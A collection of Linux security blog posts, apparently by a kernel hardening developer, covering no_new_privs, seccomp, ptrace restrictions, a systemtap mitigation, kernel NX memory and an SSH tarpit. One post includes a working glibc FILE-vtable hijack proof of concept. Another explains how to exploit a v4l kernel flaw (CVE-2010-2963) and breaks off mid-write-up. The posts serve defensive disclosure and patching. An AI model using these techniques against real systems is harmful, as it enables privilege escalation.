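        return execvp(argv[1], &argv[1]);
}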

When it tries to run ping, the setuid-ness just gets ignored:

$ gcc -Wall nnp.c -o nnp
$ ./nnp ping -c1 localhost
ping: icmp open socket: Operation not permitted

So, if your program has all the privs it’s going to need, consider using nnp to keep it from being a potential gateway to more trouble. Hopefully we can ship something like this trivial nnp helper as part of coreutils or similar, like nohup, nice, etc.
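For programs that can be modified directly, the same call can be made early in main() and then checked. A minimal sketch, assuming a kernel that supports the prctl; enter_no_new_privs() is a name made up here, and the fallback defines are only for older headers:

```c
#include <sys/prctl.h>

#ifndef PR_SET_NO_NEW_PRIVS
# define PR_SET_NO_NEW_PRIVS 38
#endif
#ifndef PR_GET_NO_NEW_PRIVS
# define PR_GET_NO_NEW_PRIVS 39
#endif

/*
 * Hypothetical helper: set nnp for the calling process and read the
 * flag back. Returns 1 if the flag is set, -1 if it could not be set.
 */
int enter_no_new_privs(void)
{
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;

    return prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0);
}
```

A return value of 1 means the flag is set. It cannot be cleared again, and it is inherited across fork() and execve().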

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


seccomp filter now in Ubuntu

Filed under: Blogging,Chrome OS,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 10:02 pm

With the generous help of the Ubuntu kernel team, Will Drewry’s seccomp filter code has landed in Ubuntu 12.04 LTS in time for Beta 2, and will be in Chrome OS shortly. Hopefully this will be in upstream soon, and filter (pun intended) to the rest of the distributions quickly.

One of the questions I’ve been asked by several people while they developed policy for earlier “mode 2” seccomp implementations was “How do I figure out which syscalls my program is going to need?” To help answer this question, and to show a simple use of seccomp filter, I’ve written up a little tutorial that walks through several steps of building a seccomp filter. It includes a header file (“seccomp-bpf.h”) for implementing the filter, and a collection of other files used to assist in syscall discovery. It should be portable, so it can build even on systems that do not have seccomp available yet.

Read more in the seccomp filter tutorial. Enjoy!

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


use of ptrace

Filed under: Blogging,Chrome OS,Security,Ubuntu,Ubuntu-Server — kees @ 4:48 pm

As I discussed last year, Ubuntu has been restricting the use of ptrace for a few releases now. I’m excited to see Fedora starting to introduce similar restrictions, but I’m disappointed at the specific implementation:

  • A method for doing this already exists (Yama). Yama is not plumbed into SELinux, but I would argue that’s not needed.
  • The SELinux method depends, unsurprisingly, on an active SELinux policy on the system, which isn’t everyone.
  • It’s not possible for regular developers (not system developers) to debug their own processes.
  • It will break all ptrace-based crash handlers (e.g. KDE, Firefox, Chrome) or tools that depend on ptrace to do their regular job (e.g. Wine, gdb, strace, ltrace).

Blocking ptrace blocks exactly one type of attack: credential extraction from a running process. In the face of a persistent attack, ultimately, anything running as the user can be trojaned, regardless of ptrace. Blocking ptrace, however, stalls the initial attack. At the moment an attacker arrives on a system, they cannot immediately extend their reach by examining the other processes (e.g. jumping down existing SSH connections, pulling passwords out of Firefox, etc). Some sensitive processes are already protected from this kind of thing because they are not “dumpable” (due to either specifically requesting this from prctl(PR_SET_DUMPABLE, ...) or due to a uid/gid transition), but many are open for abuse.
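For reference, opting a process out of being dumpable is a single call. A minimal sketch (make_undumpable() is a made-up name); this is the older, coarser protection mentioned above, not a replacement for a ptrace policy:

```c
#include <sys/prctl.h>

/*
 * Hypothetical helper: mark the calling process as not dumpable and
 * read the flag back. Returns 0 when the process is no longer
 * dumpable, -1 if the flag could not be changed.
 */
int make_undumpable(void)
{
    if (prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) != 0)
        return -1;

    return prctl(PR_GET_DUMPABLE, 0, 0, 0, 0);
}
```

Once this returns 0, unprivileged processes can no longer attach to the caller with ptrace, and it will not produce core dumps.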

The primary “valid” use cases for ptrace are crash handlers, debuggers, and memory analysis tools. In each case, they have a single common element: the process being ptraced knows which process should have permission to attach to it. What Linux lacked was a way to declare these relationships, which is what Yama added. The use of SELinux policy, for example, isn’t sufficient because the permissions are too wide (e.g. giving gdb the ability to ptrace anything just means the attacker has to use gdb to do the job). Right now, due to the use of Yama in Ubuntu, all the mentioned tools have the awareness of how to programmatically declare the ptrace relationships at runtime with prctl(PR_SET_PTRACER, ...). I find it disappointing that Fedora won’t be using this to their advantage when it is available and well tested.

Even ChromeOS uses Yama now. ;)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


fixing vulnerabilities with systemtap

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server,Vulnerabilities — kees @ 3:22 pm

Recently the upstream Linux kernel released a fix for a serious security vulnerability (CVE-2012-0056) without coordinating with Linux distributions, leaving a window of vulnerability open for end users. Luckily:

  • it is only a serious issue in 2.6.39 and later (e.g. Ubuntu 11.10 Oneiric)
  • it is “only” local
  • it requires execute access to a setuid program that generates output

Still, it’s a cross-architecture local root escalation on most common installations. Don’t stop reading just because you don’t have a local user base — attackers can use this to elevate privileges from your user, or from the web server’s user, etc.

Since there is now a nearly-complete walk-through, the urgency for fixing this is higher. While you’re waiting for your distribution’s kernel update, you can use systemtap to change your kernel’s running behavior. RedHat suggested this, and here’s how to do it in Debian and Ubuntu:

  • Download the “am I vulnerable?” tool, either from RedHat (above), or a more correct version from Brad Spengler.
  • Check if you’re vulnerable:
    $ make correct_proc_mem_reproducer
    $ ./correct_proc_mem_reproducer
  • Install the kernel debugging symbols (this is big — over 2G installed on Ubuntu) and systemtap:
    • Debian:
      # apt-get install -y systemtap linux-image-$(uname -r)-dbg
    • Ubuntu:
      • Add the debug package repository and key for your Ubuntu release:
        $ sudo apt-get install -y lsb-release
        $ echo "deb $(lsb_release -cs) main restricted universe multiverse" | \
              sudo tee -a /etc/apt/sources.list.d/ddebs.list
        $ sudo apt-key adv --keyserver --recv-keys ECDCAD72428D7C01
        $ sudo apt-get update
      • (This step does not work since the repository metadata isn’t updating correctly at the moment — see the next step for how to do this manually.) Install the debug symbols for the kernel and install systemtap:
        sudo apt-get install -y systemtap linux-image-$(uname -r)-dbgsym
      • (Manual version of the above, skip if the above works for you. Note that this has no integrity checking, etc.)
        $ sudo apt-get install -y systemtap dpkg-dev
        $ wget$(dpkg -l linux-image-$(uname -r) | grep ^ii | awk '{print $2 "-dbgsym_" $3}' | tail -n1)_$(dpkg-architecture -qDEB_HOST_ARCH).ddeb
        $ sudo dpkg -i linux-image-$(uname -r)-dbgsym.ddeb
  • Create a systemtap script to block the mem_write function, and install it:
    $ cat > proc-pid-mem.stp <<'EOM'
    probe kernel.function("mem_write@fs/proc/base.c").call {
            $count = 0
    }
    EOM
    $ sudo stap -Fg proc-pid-mem.stp
  • Check that you’re no longer vulnerable (until the next reboot):
    $ ./correct_proc_mem_reproducer
    not vulnerable

In this case, the systemtap script is changing the argument containing the size of the write to zero bytes ($count = 0), which effectively closes this vulnerability.

UPDATE: here’s a systemtap script from Soren that doesn’t require the full debug symbols. Sneaky, but it can be rather slow since it hooks all writes in the system. :)

© 2012, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


abusing the FILE structure

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 4:46 pm

When attacking a process, one interesting target on the heap is the FILE structure used with “stream functions” (fopen(), fread(), fclose(), etc) in glibc. Most of the FILE structure (struct _IO_FILE internally) is pointers to the various memory buffers used for the stream, flags, etc. What’s interesting is that this isn’t actually the entire structure. When a new FILE structure is allocated and its pointer returned from fopen(), glibc has actually allocated an internal structure called struct _IO_FILE_plus, which contains struct _IO_FILE and a pointer to struct _IO_jump_t, which in turn contains a list of pointers for all the functions attached to the FILE. This is its vtable, which, just like C++ vtables, is used whenever any stream function is called with the FILE. So on the heap, we have:

glibc FILE vtable location

In the face of use-after-free, heap overflows, or arbitrary memory write vulnerabilities, this vtable pointer is an interesting target, and, much like the pointers found in setjmp()/longjmp(), atexit(), etc, could be used to gain control of execution flow in a program. Some time ago, glibc introduced PTR_MANGLE/PTR_DEMANGLE to protect these latter functions, but until now hasn’t protected the FILE structure in the same way.
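The idea behind pointer mangling can be sketched as follows. This is an illustration, not glibc’s code: the real PTR_MANGLE is a per-architecture macro using a per-process secret set up at startup, whereas here the guard is passed in explicitly and the rotate count (MANGLE_ROT) is an arbitrary choice for the example:

```c
#include <stdint.h>

#define MANGLE_ROT 17  /* illustrative rotate count, an assumption */
#define WORD_BITS  (sizeof(uintptr_t) * 8)

/* Rotate a pointer-sized value left by MANGLE_ROT bits. */
static uintptr_t rotl(uintptr_t v)
{
    return (v << MANGLE_ROT) | (v >> (WORD_BITS - MANGLE_ROT));
}

/* Rotate a pointer-sized value right by MANGLE_ROT bits. */
static uintptr_t rotr(uintptr_t v)
{
    return (v >> MANGLE_ROT) | (v << (WORD_BITS - MANGLE_ROT));
}

/* Scramble a pointer before storing it in writable memory. */
uintptr_t mangle(uintptr_t ptr, uintptr_t guard)
{
    return rotl(ptr ^ guard);
}

/* Recover the pointer just before it is used. */
uintptr_t demangle(uintptr_t stored, uintptr_t guard)
{
    return rotr(stored) ^ guard;
}
```

An attacker who overwrites the stored value without knowing the guard ends up with a demangled pointer they do not control, so the call goes to an unpredictable address rather than a chosen one.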

I’m hoping to change this, and have introduced a patch to use PTR_MANGLE on the vtable pointer. Hopefully I haven’t overlooked something, since I’d really like to see this get in. FILE structure usage is a fair bit more common than setjmp() and atexit() usage. :)

Here’s a quick exploit demonstration in a trivial use-after-free scenario:

#include <stdio.h>
#include <stdlib.h>

void pwn(void)
{
    printf("Dave, my mind is going.\n");
}

void * funcs[] = {
    NULL, // "extra word"
    NULL, // DUMMY
    exit, // finish
    NULL, // overflow
    NULL, // underflow
    NULL, // uflow
    NULL, // pbackfail
    NULL, // xsputn
    NULL, // xsgetn
    NULL, // seekoff
    NULL, // seekpos
    NULL, // setbuf
    NULL, // sync
    NULL, // doallocate
    NULL, // read
    NULL, // write
    NULL, // seek
    pwn,  // close
    NULL, // stat
    NULL, // showmanyc
    NULL, // imbue
};

int main(int argc, char * argv[])
{
    FILE *fp;
    unsigned char *str;

    printf("sizeof(FILE): 0x%zx\n", sizeof(FILE));

    /* Allocate and free enough for a FILE plus a pointer. */
    str = malloc(sizeof(FILE) + sizeof(void *));
    printf("freeing %p\n", str);
    free(str);

    /* Open a file, observe it ended up at previous location. */
    if (!(fp = fopen("/dev/null", "r"))) {
        perror("fopen");
        return 1;
    }
    printf("FILE got %p\n", fp);
    printf("_IO_jump_t @ %p is 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));

    /* Overwrite vtable pointer. */
    *(unsigned long*)(str + sizeof(FILE)) = (unsigned long)funcs;
    printf("_IO_jump_t @ %p now 0x%08lx\n",
           str + sizeof(FILE), *(unsigned long*)(str + sizeof(FILE)));

    /* Trigger call to pwn(). */
    fclose(fp);

    return 0;
}

Before the patch:

$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0xf7796aa0
_IO_jump_t @ 0x984609c now 0x0804a060
Dave, my mind is going.

After the patch:

$ ./mini
sizeof(FILE): 0x94
freeing 0x9846008
FILE got 0x9846008
_IO_jump_t @ 0x984609c is 0x3a4125f8
_IO_jump_t @ 0x984609c now 0x0804a060
Segmentation fault

Astute readers will note that this demonstration takes advantage of another characteristic of glibc, which is that its malloc system is unrandomized, allowing an attacker to be able to determine where various structures will end up in the heap relative to each other. I’d like to see this fixed too, but it’ll require more time to study. :)

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


PGP key photo viewing

Filed under: Blogging,Debian,Security,Ubuntu — kees @ 1:35 pm

Handy command line arguments for gpg:

gpg --list-options show-photos --fingerprint 0xdc6dc026

This is nice to examine someone’s PGP photo. You can also include it in --verify-options, depending on how/when you want to see the photo (for example, when doing key signings).

If gpg doesn’t pick the right photo viewer, you can override it with --photo-viewer 'eog %I' or similar.

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


5 years with Canonical

Filed under: Blogging,Debian,General,Security,Ubuntu — kees @ 9:58 am

This month, I will have been with Canonical for 5 years. It’s been fantastic, but I’ve decided to move on. Next week, I’m going to start working for Google, helping out with ChromeOS, which I’m pretty excited about. I’m sad to be leaving Canonical, but I comfort myself by knowing that I’m not leaving Ubuntu or any other projects I’m involved in. I believe in Ubuntu, I use it everywhere, and I’m friends with so many of its people. And I’m still core-dev, so I’ll continue to break^Wsecure things as much as I can in Ubuntu, and continue working on getting similar stuff into Debian. :)

For nostalgic purposes, I dug up my first security update (sponsored by pitti), and my first Ubuntu Security Notice. I’m proud of Ubuntu’s strong security record and how far the security feature list has come. The Ubuntu Security Team is an awesome group of people, and I’m honored to have worked with them.

I’m looking forward to the new adventures, but I will miss the previous ones.

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


non-executable kernel memory progress

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 2:39 pm

The Linux kernel attempts to protect portions of its memory from unexpected modification (through potential future exploits) by setting areas read-only where the compiler has allowed it (CONFIG_DEBUG_RODATA). This, combined with marking function pointer tables “const”, reduces the number of easily writable kernel memory targets for attackers.

However, modules (which are almost the bulk of kernel code) were not handled, and remained read-write, regardless of compiler markings. In 2.6.38, thanks to the efforts of many people (especially Siarhei Liakh and Matthieu Castet), CONFIG_DEBUG_SET_MODULE_RONX was created (and CONFIG_DEBUG_RODATA expanded).

To visualize the effects, I patched Arjan van de Ven’s arch/x86/mm/dump_pagetables.c to be a loadable module so I could look at /sys/kernel/debug/kernel_page_tables without needing to rebuild my kernel with CONFIG_X86_PTDUMP.

Comparing Lucid (2.6.32), Maverick (2.6.35), and Natty (2.6.38), it’s clear to see the effects of the RO/NX improvements, especially in the “Modules” section which has no NX markings at all before 2.6.38:

lucid-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | grep NX | wc -l

maverick-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | grep NX | wc -l

natty-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | grep NX | wc -l

2.6.38’s memory region is much more granular, since each module has been chopped up for the various segment permissions:

lucid-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | wc -l

maverick-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | wc -l

natty-amd64# awk '/Modules/,/End Modules/' /sys/kernel/debug/kernel_page_tables | wc -l

For example, here’s the large “sunrpc” module. “RW” is read-write, “ro” is read-only, “x” is executable, and “NX” is non-executable:

maverick-amd64# awk '/^'$(awk '/^sunrpc/ {print $NF}' /proc/modules)'/','!/GLB/' /sys/kernel/debug/kernel_page_tables
0xffffffffa005d000-0xffffffffa0096000         228K     RW             GLB x  pte
0xffffffffa0096000-0xffffffffa0098000           8K                           pte

natty-amd64# awk '/^'$(awk '/^sunrpc/ {print $NF}' /proc/modules)'/','!/GLB/' /sys/kernel/debug/kernel_page_tables
0xffffffffa005d000-0xffffffffa007a000         116K     ro             GLB x  pte
0xffffffffa007a000-0xffffffffa0083000          36K     ro             GLB NX pte
0xffffffffa0083000-0xffffffffa0097000          80K     RW             GLB NX pte
0xffffffffa0097000-0xffffffffa0099000           8K                           pte

The latter looks a whole lot more like a proper ELF (text segment is read-only and executable, rodata segment is read-only and non-executable, and data segment is read-write and non-executable).

Just another reason to make sure you’re using your CPU’s NX bit (via 64bit or 32bit-PAE kernels)! (And no, PAE is not slower in any meaningful way.)

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


Linux Security Summit 2011 CFP

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 11:06 am

I’m once again on the program committee for the Linux Security Summit, so I’d love to see people submit talks, attend, etc. It will be held along with the Linux Plumber’s Conference, on September 8th in Santa Rosa, CA, USA.

I’d really like to see more non-LSM developers and end-users show up for this event. We need people interested in defining threats and designing defenses. There is a lot of work to be done on all kinds of fronts and having people voice their opinions and plans can really help us prioritize the areas that need the most attention.

Here’s one of many archives of the announcement, along with the website. We’ve got just under 2 months to get talks submitted (May 27th deadline), with speaker notification quickly after that on June 1st.

Come help us make Linux more secure! :)

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


ptracing siblings

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 5:29 pm

In Ubuntu, the use of ptrace is restricted. The default allowed relationship between the debugger and the debuggee is that parents are allowed to ptrace their descendants. This means that running “gdb /some/program” and “strace /some/program” Just Works. Using gdb’s “attach” and strace’s “-p” options needs CAP_SYS_PTRACE, courtesy of sudo.

The next most common use-case was that of crash handlers needing to do a live ptrace of a crashing program (in the rare case of Apport being insufficient). For example, KDE applications have a segfault handler that calls out to kdeinit and requests that the crash handling process be started on it, and then sits in a loop waiting to be attached to. While kdeinit is the parent of both the crashing program (debuggee) and the crash handling program (debugger), the debugger cannot attach to the debuggee since they are siblings, not parent/descendant. To solve this, a prctl() call was added so that the debuggee could declare whose descendants were going to attach to it. KDE patched their segfault handler to make the prctl() call and everything Just Works again.

Breakpad, the crash handler for Firefox and Chromium, was updated to do effectively the same thing, though they had to add code to pass the process id back to the debuggee since they didn’t have it handy like KDE.

Another use-case was Wine, where, to correctly emulate Windows, all Wine processes needed to be able to ptrace each other. For this, they just declared that all descendants of the wine-server could debug a given Wine process, thereby confining their ptrace festival to just Wine programs.

One of the remaining use-cases is that of a debugging IDE that doesn’t directly use ptrace itself. For example, qtcreator will launch a program and then later attach to it by launching gdb and using the “attach” command. This looks a lot like the crash handler use-case, except that the debuggee doesn’t have any idea that it is running under an IDE. A simple solution for this is to have the IDE run its programs with the LD_PRELOAD environment variable aimed at a short library that just calls prctl() with the parent process id, and suddenly the IDE and its descendants (i.e. gdb) can debug the program all day long.

I’ve got an example of this preloadable library written. If it turns out this is generally useful for IDEs, I could package it up like fakeroot and faketime.
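A rough sketch of what such a preload library can look like (this is an illustration, not the example linked above; the file and function names are made up). It assumes a Yama-enabled kernel; elsewhere the prctl() simply fails and the program runs as usual:

```c
#include <sys/prctl.h>
#include <unistd.h>

#ifndef PR_SET_PTRACER
# define PR_SET_PTRACER 0x59616d61  /* "Yama" */
#endif

/* 1 if the declaration succeeded, 0 if the kernel rejected it. */
static int ptracer_declared = -1;

/*
 * Runs when the library is loaded, before main(): declare that the
 * parent process (the IDE) and its descendants may ptrace us.
 */
__attribute__((constructor))
static void allow_parent_ptrace(void)
{
    unsigned long parent = (unsigned long)getppid();

    ptracer_declared = (prctl(PR_SET_PTRACER, parent, 0, 0, 0) == 0);
}
```

Built with something like gcc -shared -fPIC -o libptracer.so ptracer.c, the IDE would launch its programs with LD_PRELOAD pointing at the resulting library.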

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


shaping the direction of research

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server,Vulnerabilities — kees @ 1:45 pm

Other people have taken notice of the recent “auto-run” attack research against Linux. I was extremely excited to see Jon Larimer publishing this stuff, since it ultimately did not start with the words, “first we disabled NX, ASLR, and (SELinux|AppArmor) …”

I was pretty disappointed with last year’s Blackhat conference because so many of the presentations just rehashed ancient exploitation techniques, and very few actually showed new ideas. I got tired of seeing mitigation technologies disabled to accomplish an attack. That’s kind of not the point.

Anyway, Jon’s research is a step in the right direction. He defeats ASLR via brute-force, side-steps NX with ret-to-libc, and finds policy holes in AppArmor to accomplish the goal. I was pleased to see “protected by PIE and AppArmor” in his slides — Ubuntu’s hardening of evince was very intentional. It has proven to be a dangerous piece of software, which Jon’s research just further reinforces. He chose to attack the difficult target instead of going after what might have been the easier thumbnailers.

So, because of this research, we can take a step back and think about what could be done to improve the situation from a proactive security perspective. A few things stand out:

  • GNOME really shouldn’t be auto-mounting anything while the screen is locked (LP: #714958).
  • AppArmor profiles for the other thumbnailers should be written (LP: #715874).
  • The predictable ASLR found in the NX-emulation patch is long over-due to be fixed. This has been observed repeatedly before, but I hadn’t actually opened a bug for it yet. Now I have. (LP: #717412)
  • Media players should be built PIE. This has been on the Roadmap for a while now, but is not as easy as it sounds because several of them use inline assembly for speed, and that can be incompatible with PIE.
  • Consider something like grsecurity’s GRKERNSEC_BRUTE to slow down execution of potentially vulnerable processes. It’s like the 3 second delay between bad password attempts.

Trying to brute-force operational ASLR on a 64bit system, though, would probably not have worked. So, again, I stand by my main recommendation for security: use 64bit. :)

Good stuff; thanks Jon!

© 2011, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


gcc-4.5 and -D_FORTIFY_SOURCE=2 with “header” structures

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 6:11 pm

Recently gcc (4.5) improved its ability to see the size of various structures. As a result, the FORTIFY protections have suddenly gotten a bit stricter. In the past, you used to be able to do things like this:

struct thingy {
    int magic;
    char data[4];
};

void work(char *input) {
    char buffer[1000];
    int length;
    struct thingy *header;

    header = (struct thingy *)buffer;

    length = strlen(input);
    if (length > sizeof(buffer) - sizeof(*header) - 1) abort();

    strcpy(header->data, input);
    header->magic = 42;
}

The problem here is that gcc thinks that header->data is only 4 bytes long. But gcc doesn’t know we intentionally overruled this (and even did length checking), so due to -D_FORTIFY_SOURCE=2, the strcpy() checks kick in when input is more than 4 bytes.

The fix, in this case, is to use memcpy() instead. Since we actually know how long our destination is, we can replace the strcpy(...) line with:

    memcpy(header->data, input, length + 1); /* take 0-term too */

This kind of header and then data stuff is common for protocol handlers. So far, things like Wine, TFTP, and others have been experiencing problems with the change. Please keep an eye out for it when doing testing.
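Put together as a self-contained function, the memcpy() version looks something like the sketch below. pack_thingy() and its explicit buflen parameter are made up for the example, and the caller is assumed to pass a buffer that is suitably aligned for struct thingy:

```c
#include <stddef.h>
#include <string.h>

struct thingy {
    int magic;
    char data[4];   /* really "whatever follows the header" */
};

/*
 * Hypothetical helper: write a header plus NUL-terminated payload into
 * buffer. Returns 0 on success, -1 if the payload does not fit.
 */
int pack_thingy(void *buffer, size_t buflen, const char *input)
{
    struct thingy *header = buffer;
    size_t payload_offset = offsetof(struct thingy, data);
    size_t length = strlen(input);

    /* Room needed: header fields, payload, and the terminator. */
    if (buflen <= payload_offset || length > buflen - payload_offset - 1)
        return -1;

    /* memcpy() is bounded by our own length check, not by data[4]. */
    memcpy(header->data, input, length + 1);
    header->magic = 42;
    return 0;
}
```

The check is written with offsetof() and tests buflen first so that the subtraction cannot wrap around for tiny buffers.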

© 2010, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


TARPIT iptables target

Filed under: Blogging,Debian,Networking,Security,Ubuntu,Ubuntu-Server — kees @ 9:21 am

Want to use a network tarpit? It’s so easy to set up! Thanks to jpds for this whole post. :)

sudo module-assistant auto-install xtables-addons-source
sudo iptables -p tcp ... -j TARPIT

Though no such thing exists for IPv6 yet.

Here it is watching over the SSH port:

iptables -N INGRESS-SSH
iptables -A INPUT -p tcp --dport 22 -m state --state NEW -j INGRESS-SSH
iptables -A INGRESS-SSH -p tcp --dport 22 -m state --state NEW -m recent --name SSH --set
iptables -A INGRESS-SSH -p tcp --dport 22 -m state --state NEW -m recent --name SSH --update --rttl --seconds 60 --hitcount 4 -j LOG --log-prefix "[INGRESS SSH TARPIT] "
iptables -A INGRESS-SSH -p tcp --dport 22 -m state --state NEW -m recent --name SSH --rcheck --rttl --seconds 60 --hitcount 4 -j TARPIT

© 2010, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


security is more than bug fixing

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server — kees @ 12:20 pm

Security is more than bug fixing. Security fixing/updating, the thing most people are exposed to, is “reactive security”. However, a large area of security work is “proactive” where defensive abilities are put in place to try and catch problems before they happen, or make classes of vulnerabilities unexploitable. This kind of security is what a lot of people don’t understand, and I think it’s important to point out so the distinction can be clearly seen.

In the Linux kernel, there’s yet another distinction: userspace proactive security and kernel proactive security. Most of the effort in kernel code has been protecting userspace from itself (things like Address Space Layout Randomization), but less attention has been given to protecting the kernel from userspace (currently if a serious enough flaw is found in the kernel, it is usually very easy to exploit it).

One project has taken great strides with proactive security for the Linux kernel: PaX and grsecurity. There hasn’t been a concerted effort to get its pieces upstream and it’s long overdue. People are starting to take proactive kernel security more seriously, though there is still plenty of debate.

While I did my best to push some userspace protections upstream earlier in the year, now it’s time for kernel protections. Want to help? Here is the initial list of things to do.

Dan Rosenberg has started the information leaks discussion, and I’ve started the read-only memory discussion. Hopefully this will go somewhere good.

© 2010, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


Jettison Jaunty

Filed under: Blogging,Security,Ubuntu,Ubuntu-Server — kees @ 10:07 pm

Jaunty Jackalope (Ubuntu 9.04) went End-Of-Life on Saturday.

Looking back through my build logs, it seems my desktop did 223 builds, spending 19 hours, 18 minutes, and 23 seconds doing builds during the development cycle of Jaunty. Once released, it performed an additional 99 builds, taking 18 hours, 3 minutes, and 37 seconds for security updates. As before, these times obviously don’t include patch hunting/development, failed builds, testing, stuff done on my laptop or the porting machines, etc.

Combined devel/security build standings per current release:

dapper: 59:19:10
hardy: 189:32:51
karmic: 57:44:27
lucid: 36:07:05
maverick: 13:54:15

Looking at the build histories, Gutsy and Jaunty took about the same amount of build time (around 19 hours) during development, but Intrepid was a whopping 70 hours. This was related to all the default compiler flag testing there: I rebuilt the entire “main” component multiple times that release. Jaunty was a nice return to normalcy.

© 2010, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.


CVE-2010-2963 v4l compat exploit

Filed under: Blogging,Debian,Security,Ubuntu,Ubuntu-Server,Vulnerabilities — kees @ 3:41 pm

If you’re running a 64-bit system, and you’ve got users with access to a video device (/dev/video*), then be sure you update your kernels for CVE-2010-2963. I’ve been slowly making my way through auditing the many uses of the copy_from_user() function in the Linux kernel, and ran into this vulnerability.

Here’s the kernel code from drivers/media/video/v4l2-compat-ioctl32.c:

static int get_microcode32(struct video_code *kp, struct video_code32 __user *up)
{
        if (!access_ok(VERIFY_READ, up, sizeof(struct video_code32)) ||
                copy_from_user(kp->loadwhat, up->loadwhat, sizeof(up->loadwhat)) ||
                get_user(kp->datasize, &up->datasize) ||
                copy_from_user(kp->data, up->data, up->datasize))
                        return -EFAULT;
        return 0;
}

Note that kp->data is being used as the target for up->data in the final copy_from_user() without actually verifying that kp->data is pointing anywhere safe. Here’s the caller of get_microcode32:

static long do_video_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
        union {
                struct video_tuner vt;
                struct video_code vc;
...
        } karg;
        void __user *up = compat_ptr(arg);
...
        switch (cmd) {
...
        case VIDIOCSMICROCODE:
                err = get_microcode32(&karg.vc, up);
...

So, the contents of up are totally under control of the caller, and the contents of karg (in our case, the video_code structure) are not initialized at all. So, it seems like a call for VIDIOCSMICROCODE would copy up->datasize bytes from up->data to whatever kernel address the uninitialized kp->data happens to hold, just causing an Oops, since we don’t control what is on the kernel’s stack.

But wait, who says we can’t control the contents of the kernel’s stack? In fact, this compat function makes it extremely easy. Let’s look back at the union. Notice the struct video_tuner? That gets populated from the caller’s up memory via this case of the switch (cmd) statement:

        case VIDIOCSTUNER:
        case VIDIOCGTUNER:
                err = get_video_tuner32(&karg.vt, up);

So, to control the kernel stack, we just need to call this ioctl twice in a row: once to populate the stack via VIDIOCSTUNER with the contents we want (including the future address for video_code->data, which starts at the same location as video_tuner->name[20]), and then again with VIDIOCSMICROCODE.
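The overlap described above can be checked with offsetof(). This is a minimal userspace sketch, assuming the V4L1 structure layouts below (copied here for illustration, not pulled from kernel headers) and a 64-bit build with 8-byte pointers. The union and helper names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Assumed V4L1 layouts, reproduced only to illustrate the overlap. */
struct video_tuner {
        int tuner;
        char name[32];
        unsigned long rangelow, rangehigh;
        uint32_t flags;
        uint16_t mode;
        uint16_t signal;
};

struct video_code {
        char loadwhat[16];
        int datasize;
        uint8_t *data;
};

/* Hypothetical model of the on-stack union in do_video_ioctl(). */
union karg_model {
        struct video_tuner vt;
        struct video_code vc;
};

/* Byte offset of the pointer that get_microcode32() trusts.
 * Both union members start at offset 0, so struct offsets apply directly. */
static size_t data_pointer_offset(void)
{
        return offsetof(struct video_code, data);
}

/* Index into vt.name[] whose bytes land on vc.data. */
static size_t overlapping_name_index(void)
{
        return offsetof(struct video_code, data) -
               offsetof(struct video_tuner, name);
}
```

With 8-byte pointers, data sits at offset 24 and name starts at offset 4, so the first byte of the pointer lines up with name[20]. Whatever the tuner ioctl leaves in those name bytes becomes the copy destination later.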

There are two tricks involved here: the definition of the VIDIOCSMICROCODE case in the kernel is wrong, and calling the ioctls without any preparation can trigger other kernel work (memory faults, etc) that may destroy the stack contents. First, we need the real value for the desired case statement. This turns out to be 0x4020761b. Next, we just repeatedly call the setup ioctl in an attempt to get incidental kernel work out of the way so that our last ioctl doing the stack preparation will stick, and then we call the buggy ioctl to trigger the vulnerability.
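To see what 0x4020761b encodes, here is a small sketch that splits an ioctl number into its fields. It assumes the generic Linux ioctl encoding used on x86 (8-bit number, 8-bit type, 14-bit size, 2-bit direction). The struct and function names are hypothetical.

```c
#include <stdint.h>

/* Fields of an ioctl command number, assuming the generic Linux
 * encoding (as used on x86): nr[0:7] type[8:15] size[16:29] dir[30:31]. */
struct ioctl_fields {
        unsigned dir;   /* 1 = userspace writes to the kernel, 2 = reads */
        unsigned size;  /* size in bytes of the argument structure */
        char type;      /* driver "magic" character */
        unsigned nr;    /* command number within that driver */
};

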